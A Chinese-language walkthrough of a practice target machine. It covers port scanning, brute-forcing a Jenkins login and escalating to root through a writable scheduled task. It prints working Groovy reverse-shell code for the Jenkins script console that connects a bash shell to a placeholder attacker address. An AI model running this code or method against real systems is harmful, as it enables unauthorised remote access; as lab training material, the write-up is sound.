文章讲述了通过arp-scan和nmap发现并扫描靶机,尝试mysql登录未果后,转向Web端。在8080端口找到登录界面,通过字典爆破登录Jenkins。利用Jenkins的脚本执行功能反弹shell,进一步通过计划任务实现提权,最终获取root权限。整个过程展示了常规的渗透测试步骤。
靶机发现和端口扫描
利用arp-scan -l发现靶机,同时利用nmap对靶机进行简单的端口扫描。
分别开放了22 80 3306 和8080
在利用脚本漏洞扫描时并未发现有什么明显漏洞
建立简单的思路 先尝试mysql登录---web---ssh爆破
mysql尝试
尝试mysql登录后无果进入web端
web
分别访问80和8080
其中8080这里跳转到了一个登录界面。再去探索这两个界面没有什么发现,尝试爆破目录。
这里在80端口可以找到一个access.html的界面。
分别解密以后建立一个小的用户和密码字典
这时回到登录窗口用字典爆破,eder/vipsu可以登录
这里学习到了Jenkins存在一个后台可执行命令的地方 系统管理-->脚本命令执行。
这里在其他博主的文章中找到了反弹shell的代码,直接使用即可,前两行为设置自己的ip和端口。
String host="x.x.x.x";
int port=1333;
String cmd="/bin/bash";
//ProcessBuilder创建操作系统进程
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed())
{while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());
while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try
{p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();在本地监听指定的端口号,等待连接即可
连接成功后这里搜集一下基础信息 uname -a sudo -l之后发现并没有什么明显可以利用的地方,那看看计划任务吧,在计划任务中找到一条记录,去该目录下发现这条任务也时任意用户写入的,那么直接写一个反弹shell就好,等待连接即可。
最终拿下root权限
总结
靶机整体水平比较简单。主要思路十分常规,搜索目录,找到账号信息进入后台,在后台功能点出发现可执行系统命令,反弹shell后利用计划任务提权。
扫一扫
851
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
